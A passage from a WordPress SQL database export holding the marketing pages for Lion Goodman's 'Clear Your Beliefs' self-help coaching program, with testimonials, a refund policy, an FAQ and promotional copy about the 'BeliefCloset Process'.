Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:17:53', '2014-12-14 19:17:53', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2049, 2, '2014-12-14 14:22:10', '2014-12-14 19:22:10', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, 